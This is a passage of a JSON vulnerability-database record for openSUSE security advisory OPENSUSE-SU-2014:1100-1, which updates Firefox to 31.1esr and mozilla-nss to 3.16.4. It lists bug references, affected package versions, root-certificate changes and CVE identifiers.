"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:21:58", "references": ["https://bugzilla.novell.com/887746", "https://bugzilla.novell.com/603356", "https://bugzilla.novell.com/750044", "https://bugzilla.novell.com/765204", "https://bugzilla.novell.com/637303", "https://bugzilla.novell.com/861847", "https://bugzilla.novell.com/808243", "https://bugzilla.novell.com/528406", "https://bugzilla.novell.com/664211", "https://bugzilla.novell.com/657016", "https://bugzilla.novell.com/667155", "https://bugzilla.novell.com/771583", "https://bugzilla.novell.com/894201", "https://bugzilla.novell.com/825935", "https://bugzilla.novell.com/642502", "https://bugzilla.novell.com/720264", "https://bugzilla.novell.com/41903", "https://bugzilla.novell.com/104586", "https://bugzilla.novell.com/737533", "https://bugzilla.novell.com/881874", "https://bugzilla.novell.com/503151", "https://bugzilla.novell.com/726758", "https://bugzilla.novell.com/868603", "https://bugzilla.novell.com/593807", "https://bugzilla.novell.com/649492", "https://bugzilla.novell.com/622506", "https://bugzilla.novell.com/576969", "https://bugzilla.novell.com/796895", "https://bugzilla.novell.com/689281", "https://bugzilla.novell.com/354469", "https://bugzilla.novell.com/840485", "https://bugzilla.novell.com/847708", "https://bugzilla.novell.com/701296", "https://bugzilla.novell.com/744275", "https://bugzilla.novell.com/385739", "https://bugzilla.novell.com/790140", "https://bugzilla.novell.com/894370", "https://bugzilla.novell.com/529180", "https://bugzilla.novell.com/417869", "https://bugzilla.novell.com/429179", "https://bugzilla.novell.com/747328", "https://bugzilla.novell.com/712224", "https://bugzilla.novell.com/758408", "https://bugzilla.novell.com/559819", "https://bugzilla.novell.com/441084", "https://bugzilla.novell.com/455804", "https://bugzilla.novell.com/876833", "https://bugzilla.novell.com/804248", "https://bugzilla.novell.com/390992", "https://bugzilla.novell.com/819204", "https://bugzilla.novell.com/733002", "https://bugzilla.novell.com/777588", "https://bugzilla.novell.com/854370", "https://bugzilla.novell.com/484321", "https://bugzilla.novell.com/786522", "https://bugzilla.novell.com/582276", "https://bugzilla.novell.com/527418", "https://bugzilla.novell.com/732898", "https://bugzilla.novell.com/755060", "https://bugzilla.novell.com/714931", "https://bugzilla.novell.com/749440", "https://bugzilla.novell.com/833389", "https://bugzilla.novell.com/783533", "https://bugzilla.novell.com/728520", "https://bugzilla.novell.com/813026", "https://bugzilla.novell.com/439841", "https://bugzilla.novell.com/746616", "https://bugzilla.novell.com/518603", "https://bugzilla.novell.com/542809", "https://bugzilla.novell.com/645315", "https://bugzilla.novell.com/875378", "https://bugzilla.novell.com/586567"], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "libfreebl3-3.16.4-94.1.i586.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-other-24.8.0-127.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-debuginfo-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-debuginfo-24.8.0-127.1.x86_64.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-debuginfo-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-debuginfo-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "libfreebl3-debuginfo-3.16.4-94.1.x86_64.rpm", "packageName": "libfreebl3-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "libsoftokn3-debuginfo-3.16.4-94.1.i586.rpm", "packageName": "libsoftokn3-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "libfreebl3-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-devel-24.8.0-127.1.x86_64.rpm", "packageName": "MozillaFirefox-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "libsoftokn3-x86-3.16.4-94.1.ia64.rpm", "packageName": "libsoftokn3-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-certs-debuginfo-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-certs-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "mozilla-nss-debuginfo-x86-3.16.4-94.1.ia64.rpm", "packageName": "mozilla-nss-debuginfo-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-certs-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-certs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "mozilla-nss-sysinit-debuginfo-x86-3.16.4-94.1.ia64.rpm", "packageName": "mozilla-nss-sysinit-debuginfo-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-certs-debuginfo-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-certs-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-debugsource-24.8.0-127.1.x86_64.rpm", "packageName": "MozillaFirefox-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-other-24.8.0-127.1.i586.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-certs-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-certs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "i586", "packageFilename": "MozillaFirefox-buildsymbols-24.8.0-127.1.i586.rpm", "packageName": "MozillaFirefox-buildsymbols", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "libsoftokn3-3.16.4-94.1.x86_64.rpm", "packageName": "libsoftokn3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "mozilla-nss-sysinit-x86-3.16.4-94.1.ia64.rpm", "packageName": "mozilla-nss-sysinit-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "libfreebl3-x86-3.16.4-94.1.ia64.rpm", "packageName": "libfreebl3-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "libsoftokn3-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "libsoftokn3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "mozilla-nss-certs-x86-3.16.4-94.1.ia64.rpm", "packageName": "mozilla-nss-certs-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "libfreebl3-debuginfo-3.16.4-94.1.i586.rpm", "packageName": "libfreebl3-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "mozilla-nss-x86-3.16.4-94.1.ia64.rpm", "packageName": "mozilla-nss-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "i586", "packageFilename": "MozillaFirefox-debugsource-24.8.0-127.1.i586.rpm", "packageName": "MozillaFirefox-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-sysinit-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-sysinit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-certs-debuginfo-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-certs-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-sysinit-debuginfo-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-sysinit-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "libfreebl3-debuginfo-x86-3.16.4-94.1.ia64.rpm", "packageName": "libfreebl3-debuginfo-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-certs-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-certs-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "libsoftokn3-3.16.4-94.1.i586.rpm", "packageName": "libsoftokn3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "libfreebl3-3.16.4-94.1.x86_64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-debuginfo-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-tools-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-debugsource-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-branding-upstream-24.8.0-127.1.x86_64.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-devel-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-debuginfo-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-tools-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "libsoftokn3-debuginfo-3.16.4-94.1.x86_64.rpm", "packageName": "libsoftokn3-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-buildsymbols-24.8.0-127.1.x86_64.rpm", "packageName": "MozillaFirefox-buildsymbols", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "i586", "packageFilename": "MozillaFirefox-devel-24.8.0-127.1.i586.rpm", "packageName": "MozillaFirefox-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-common-24.8.0-127.1.i586.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-debugsource-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-sysinit-debuginfo-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-sysinit-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "i586", "packageFilename": "MozillaFirefox-branding-upstream-24.8.0-127.1.i586.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-24.8.0-127.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "libfreebl3-debuginfo-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "libfreebl3-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "libsoftokn3-debuginfo-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "libsoftokn3-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-sysinit-debuginfo-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-sysinit-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "mozilla-nss-certs-debuginfo-x86-3.16.4-94.1.ia64.rpm", "packageName": "mozilla-nss-certs-debuginfo-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "libsoftokn3-debuginfo-x86-3.16.4-94.1.ia64.rpm", "packageName": "libsoftokn3-debuginfo-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-common-24.8.0-127.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "i586", "packageFilename": "MozillaFirefox-24.8.0-127.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "i586", "packageFilename": "MozillaFirefox-debuginfo-24.8.0-127.1.i586.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-devel-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-sysinit-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-sysinit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-sysinit-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-sysinit-32bit", "operator": "lt"}], "description": "This patch contains security updates for\n\n * mozilla-nss 3.16.4\n - The following 1024-bit root CA certificate was restored to allow more\n time to develop a better transition strategy for affected sites. It\n was removed in NSS 3.16.3, but discussion in the\n mozilla.dev.security.policy forum led to the decision to keep this\n root included longer in order to give website administrators more time\n to update their web servers.\n - CN = GTE CyberTrust Global Root\n * In NSS 3.16.3, the 1024-bit &quot;Entrust.net Secure Server Certification\n Authority&quot; root CA certificate was removed. In NSS 3.16.4, a 2048-bit\n intermediate CA certificate has been included, without explicit trust.\n The intention is to mitigate the effects of the previous removal of\n the 1024-bit Entrust.net root certificate, because many public\n Internet sites still use the &quot;USERTrust Legacy Secure Server CA&quot;\n intermediate certificate that is signed by the 1024-bit Entrust.net\n root certificate. The inclusion of the intermediate certificate is a\n temporary measure to allow those sites to function, by allowing them\n to find a trust path to another 2048-bit root CA certificate. The\n temporarily included intermediate certificate expires November 1, 2015.\n\n * Firefox 31.1esr Firefox is updated from 24esr to 31esr as maintenance\n for version 24 stopped\n\n", "edition": 1, "reporter": "Suse", "published": "2014-09-09T18:04:16", "title": "Firefox update to 31.1esr (important)", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1945", "CVE-2011-3648", "CVE-2014-1505", "CVE-2014-1536", "CVE-2011-0061", "CVE-2011-0077", "CVE-2014-1513", "CVE-2012-0478", "CVE-2012-4193", "CVE-2012-0442", "CVE-2013-5601", "CVE-2013-1687", "CVE-2013-5612", "CVE-2013-1692", "CVE-2010-0654", "CVE-2012-1962", "CVE-2013-0743", "CVE-2012-0443", "CVE-2012-5842", "CVE-2012-4212", "CVE-2013-5595", "CVE-2010-0176", "CVE-2014-1530", "CVE-2011-0083", "CVE-2010-1203", "CVE-2013-1737", "CVE-2012-4214", "CVE-2008-1236", "CVE-2013-5611", "CVE-2012-1970", "CVE-2008-3835", "CVE-2013-1709", "CVE-2007-3738", "CVE-2012-3989", "CVE-2013-5616", "CVE-2013-1678", "CVE-2010-2762", "CVE-2012-5830", "CVE-2013-0763", "CVE-2014-1510", "CVE-2011-3026", "CVE-2012-0460", "CVE-2013-5613", "CVE-2012-1973", "CVE-2014-1522", "CVE-2011-3654", "CVE-2014-1567", "CVE-2012-1974", "CVE-2010-2766", "CVE-2012-4195", "CVE-2012-3986", "CVE-2013-0783", "CVE-2007-3734", "CVE-2011-2371", "CVE-2014-1481", "CVE-2013-1670", "CVE-2012-4185", "CVE-2010-3777", "CVE-2012-3991", "CVE-2013-1719", "CVE-2012-3968", "CVE-2013-1725", "CVE-2012-3963", "CVE-2014-1539", "CVE-2010-0174", "CVE-2012-0452", "CVE-2013-1735", "CVE-2012-1956", "CVE-2014-1487", "CVE-2012-3978", "CVE-2012-3985", "CVE-2013-0746", "CVE-2012-5829", "CVE-2009-1571", "CVE-2012-1944", "CVE-2012-5838", "CVE-2011-2986", "CVE-2010-1205", "CVE-2014-1538", "CVE-2012-4213", "CVE-2013-1685", "CVE-2012-0479", "CVE-2013-5609", "CVE-2007-3737", "CVE-2013-0766", "CVE-2007-3736", "CVE-2012-1940", "CVE-2013-1697", "CVE-2014-1484", "CVE-2014-1525", "CVE-2012-3993", "CVE-2013-5619", "CVE-2012-5837", "CVE-2008-5500", "CVE-2012-5836", "CVE-2014-1509", "CVE-2009-0772", "CVE-2013-0787", "CVE-2012-3995", "CVE-2012-4201", "CVE-2010-0159", "CVE-2009-0773", "CVE-2011-3659", "CVE-2011-3663", "CVE-2014-1494", "CVE-2014-1559", "CVE-2013-0747", "CVE-2012-0470", "CVE-2012-0446", "CVE-2008-4063", "CVE-2014-1537", "CVE-2013-1694", "CVE-2014-1523", "CVE-2012-1972", "CVE-2010-1200", "CVE-2010-0175", "CVE-2012-3988", "CVE-2012-0457", "CVE-2010-3778", "CVE-2012-3994", "CVE-2013-5615", "CVE-2013-1680", "CVE-2012-3962", "CVE-2012-0459", "CVE-2011-2362", "CVE-2014-1529", "CVE-2013-1724", "CVE-2010-1213", "CVE-2013-5597", "CVE-2012-5843", "CVE-2014-1543", "CVE-2014-1486", "CVE-2011-0085", "CVE-2013-5590", "CVE-2008-5510", "CVE-2011-0080", "CVE-2013-0780", "CVE-2008-5502", "CVE-2010-3765", "CVE-2013-1732", "CVE-2013-0744", "CVE-2013-0795", "CVE-2008-1237", "CVE-2013-1720", "CVE-2008-4070", "CVE-2013-0748", "CVE-2012-4183", "CVE-2010-3178", "CVE-2013-1679", "CVE-2007-3285", "CVE-2013-5610", "CVE-2013-0768", "CVE-2011-3661", "CVE-2012-4181", "CVE-2014-1532", "CVE-2013-6671", "CVE-2009-0040", "CVE-2011-3652", "CVE-2013-0755", "CVE-2008-4067", "CVE-2014-1548", "CVE-2011-2364", "CVE-2014-1531", "CVE-2013-0752", "CVE-2012-4186", "CVE-2014-1508", "CVE-2012-1948", "CVE-2008-5012", "CVE-2012-1938", "CVE-2013-0796", "CVE-2012-0449", "CVE-2010-3769", "CVE-2012-3969", "CVE-2014-1502", "CVE-2013-1723", "CVE-2013-0782", "CVE-2012-1953", "CVE-2012-1949", "CVE-2014-1542", "CVE-2012-0456", "CVE-2011-2372", "CVE-2010-3169", "CVE-2012-3970", "CVE-2011-0053", "CVE-2012-5840", "CVE-2010-3176", "CVE-2012-4191", "CVE-2010-3174", "CVE-2010-3768", "CVE-2014-1477", "CVE-2013-0800", "CVE-2010-1212", "CVE-2013-1681", "CVE-2010-1211", "CVE-2010-1121", "CVE-2013-0773", "CVE-2013-0754", "CVE-2010-3167", "CVE-2012-4202", "CVE-2010-3180", "CVE-2012-3957", "CVE-2011-3660", "CVE-2014-1540", "CVE-2014-1534", "CVE-2012-1941", "CVE-2013-1738", "CVE-2014-1482", "CVE-2014-1479", "CVE-2008-4066", "CVE-2008-5018", "CVE-2012-3984", "CVE-2014-1504", "CVE-2012-0444", "CVE-2011-3650", "CVE-2014-1511", "CVE-2010-2753", "CVE-2012-1946", "CVE-2010-3776", "CVE-2012-4182", "CVE-2008-1233", "CVE-2012-4187", "CVE-2012-3983", "CVE-2011-0062", "CVE-2008-0016", "CVE-2011-3101", "CVE-2010-3168", "CVE-2013-0788", "CVE-2013-1728", "CVE-2014-1545", "CVE-2010-0173", "CVE-2012-0472", "CVE-2013-5592", "CVE-2013-1730", "CVE-2008-4059", "CVE-2010-2764", "CVE-2014-1492", "CVE-2011-0081", "CVE-2009-0771", "CVE-2007-3670", "CVE-2012-1954", "CVE-2009-0774", "CVE-2014-1556", "CVE-2012-0461", "CVE-2011-2376", "CVE-2012-3958", "CVE-2012-0469", "CVE-2014-1563", "CVE-2014-1524", "CVE-2014-1512", "CVE-2012-1975", "CVE-2011-0075", "CVE-2013-1690", "CVE-2012-0464", "CVE-2013-0775", "CVE-2012-1967", "CVE-2013-5604", "CVE-2014-1514", "CVE-2010-3166", "CVE-2011-0074", "CVE-2013-0801", "CVE-2012-3956", "CVE-2010-2769", "CVE-2012-3982", "CVE-2009-3555", "CVE-2013-1714", "CVE-2011-2989", "CVE-2010-1196", "CVE-2008-5021", "CVE-2008-5017", "CVE-2013-0769", "CVE-2012-3966", "CVE-2013-0771", "CVE-2014-1490", "CVE-2012-5839", "CVE-2013-0757", "CVE-2014-1498", "CVE-2012-1961", "CVE-2010-3173", "CVE-2012-4216", "CVE-2008-4062", "CVE-2010-3179", "CVE-2010-0182", "CVE-2014-1565", "CVE-2012-3967", "CVE-2013-0749", "CVE-2011-3651", "CVE-2008-4060", "CVE-2007-3656", "CVE-2008-1234", "CVE-2012-1951", "CVE-2012-0475", "CVE-2014-1555", "CVE-2014-1564", "CVE-2012-1952", "CVE-2010-1201", "CVE-2013-0761", "CVE-2013-1669", "CVE-2010-1585", "CVE-2012-3959", "CVE-2012-0455", "CVE-2014-1558", "CVE-2011-0084", "CVE-2012-0759", "CVE-2007-3089", "CVE-2014-1519", "CVE-2013-1701", "CVE-2012-0474", "CVE-2012-3975", "CVE-2010-2768", "CVE-2008-5014", "CVE-2013-1684", "CVE-2008-4058", "CVE-2012-4184", "CVE-2012-0447", "CVE-2014-1547", "CVE-2011-3232", "CVE-2012-4205", "CVE-2014-1480", "CVE-2014-1500", "CVE-2011-0069", "CVE-2013-6630", "CVE-2008-5022", "CVE-2008-5512", "CVE-2014-1497", "CVE-2013-5596", "CVE-2012-3992", "CVE-2008-1235", "CVE-2013-1676", "CVE-2013-0789", "CVE-2008-5501", "CVE-2008-4068", "CVE-2008-5016", "CVE-2013-1675", "CVE-2014-1478", "CVE-2012-3980", "CVE-2008-5503", "CVE-2011-2374", "CVE-2012-1955", "CVE-2012-1960", "CVE-2012-0445", "CVE-2012-0462", "CVE-2012-4217", "CVE-2013-1686", "CVE-2013-0745", "CVE-2013-0756", "CVE-2012-4218", "CVE-2013-0760", "CVE-2011-2377", "CVE-2014-1485", "CVE-2014-1493", "CVE-2007-3735", "CVE-2011-3000", "CVE-2010-2765", "CVE-2014-1544", "CVE-2010-2767", "CVE-2011-0078", "CVE-2012-3960", "CVE-2010-3175", "CVE-2012-0451", "CVE-2011-3655", "CVE-2012-4180", "CVE-2013-0767", "CVE-2010-3182", "CVE-2009-0776", "CVE-2013-5603", "CVE-2012-1959", "CVE-2011-2363", "CVE-2011-0070", "CVE-2013-1682", "CVE-2012-1947", "CVE-2013-6673", "CVE-2013-1674", "CVE-2013-0762", "CVE-2014-1562", "CVE-2010-3170", "CVE-2011-3005", "CVE-2012-4208", "CVE-2011-3658", "CVE-2014-1541", "CVE-2011-2373", "CVE-2008-5511", "CVE-2011-2992", "CVE-2014-1488", "CVE-2012-1957", "CVE-2012-1958", "CVE-2008-4064", "CVE-2012-1976", "CVE-2011-1187", "CVE-2012-5835", "CVE-2014-1552", "CVE-2010-3183", "CVE-2010-1202", "CVE-2012-0468", "CVE-2013-5599", "CVE-2014-1553", "CVE-2014-1549", "CVE-2013-1713", "CVE-2008-5508", "CVE-2012-3972", "CVE-2012-4207", "CVE-2011-2988", "CVE-2008-4061", "CVE-2013-5591", "CVE-2010-1199", "CVE-2012-4204", "CVE-2013-5602", "CVE-2011-2985", "CVE-2012-4192", "CVE-2011-2987", "CVE-2012-4188", "CVE-2012-0441", "CVE-2013-0774", "CVE-2008-5024", "CVE-2013-0753", "CVE-2012-5833", "CVE-2014-1557", "CVE-2013-1736", "CVE-2014-1526", "CVE-2013-0776", "CVE-2012-3964", "CVE-2013-5593", "CVE-2014-1550", "CVE-2013-1718", "CVE-2012-5841", "CVE-2014-1533", "CVE-2013-1717", "CVE-2010-2754", "CVE-2008-5507", "CVE-2012-3990", "CVE-2014-1491", "CVE-2013-6672", "CVE-2013-5614", "CVE-2008-4065", "CVE-2013-1693", "CVE-2010-2760", "CVE-2013-0750", "CVE-2012-1937", "CVE-2014-1560", "CVE-2012-4215", "CVE-2013-6629", "CVE-2012-0463", "CVE-2013-1677", "CVE-2011-2991", "CVE-2013-0770", "CVE-2013-0793", "CVE-2012-4179", "CVE-2011-3001", "CVE-2014-1483", "CVE-2014-1489", "CVE-2011-3062", "CVE-2012-0477", "CVE-2013-1722", "CVE-2012-0473", "CVE-2012-4194", "CVE-2011-2365", "CVE-2012-4209", "CVE-2012-1963", "CVE-2012-4196", "CVE-2008-5506", "CVE-2013-1710", "CVE-2012-0467", "CVE-2012-0458", "CVE-2013-0758", "CVE-2013-5600", "CVE-2010-2752", "CVE-2014-1499", "CVE-2014-1518", "CVE-2012-0471", "CVE-2012-3961", "CVE-2014-1561", "CVE-2012-3971", "CVE-2013-0764", "CVE-2014-1528", "CVE-2013-5618", "CVE-2011-0072"], "modified": "2014-09-09T18:04:16", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00004.html", "id": "OPENSUSE-SU-2014:1100-1", 